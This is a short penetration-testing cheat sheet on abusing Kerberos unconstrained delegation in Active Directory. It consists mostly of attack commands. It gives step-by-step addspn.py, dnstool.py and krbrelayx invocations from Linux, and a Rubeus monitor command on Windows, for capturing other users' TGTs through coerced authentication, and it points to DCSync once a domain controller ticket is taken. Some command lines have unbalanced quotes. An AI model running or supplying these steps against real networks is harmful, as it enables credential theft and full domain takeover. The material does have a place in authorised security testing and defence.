Unconstrained Delegation Abuse (KUD)

Gain a TGT as any user who authenticates to an attacker controlled host with unconstrained delegation set.

Requirements

• Control of an account with unconstrained delegation.
  • Except for users who are "Protected Users" or marked as "Account is sensitive and cannot be delegated."

Receive a TGT

TARGET = Computer with unconstrained delegation

Linux (Remotely)

• Requires Windows Server 2012+

1. Add ATTACKER$ as AdditionalDnsHostName on SPN of TARGET$

addspn.py -u '<domain>\<TARGET> -p ':<nt_hash>' -s 'HOST/ATTACKER --additional 'DomainController'

2. Add ATTACKER$ to DNS on TARGET$ SPN.

dnstool.py -u '<domain>\<TARGET>' -p ':<nt_hash>' -r '<ATTACKER>.<domain_fqdn>' -d '<ATTACKER_ip>' --action add DomainController 

3. Verify DNS Record

nslookup <ATTACKER>.<domain_fqdn> <dc_fqdn_or_ip>

Wait a few minutes

4. Start krbrelayx

If the TARGET is a user

krbrelayx --krbsalt '<salt>' --krbpass '<TARGET_password>'

User account SALT = <UPPERCASE_REALM_FQDN> + <case_sensitive_TARGET_username>

Concatenate values, no space.

If the TARGET is a machine

krbrelayx --aesKey '<TARGET$_AES_KEY>'

5. Coerce Authentication

Coerce authentication to krbrelayx on the remote Linux host.

6. Use the TGT

if successful krbrelayx will receive a TGT. Use it.

export KRB5CCNAME=<tgt_user>.ccache

Windows (Locally)

1. Listen for a TGT

Start Rubeus listener

Rubeus.exe monitor /interval:5

Outputs base64 TGT when one is received.

2. Coerce Authentication

Coerce authentication to the Rubeus listener. If successful the Rubeus listener will receive a base64 TGT.

3. Use the TGT

Attack Paths

• DCSync
  • If a TGT is captured for DC$ or some other privileged user.
• Review discovery steps in the methodology

References

• https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/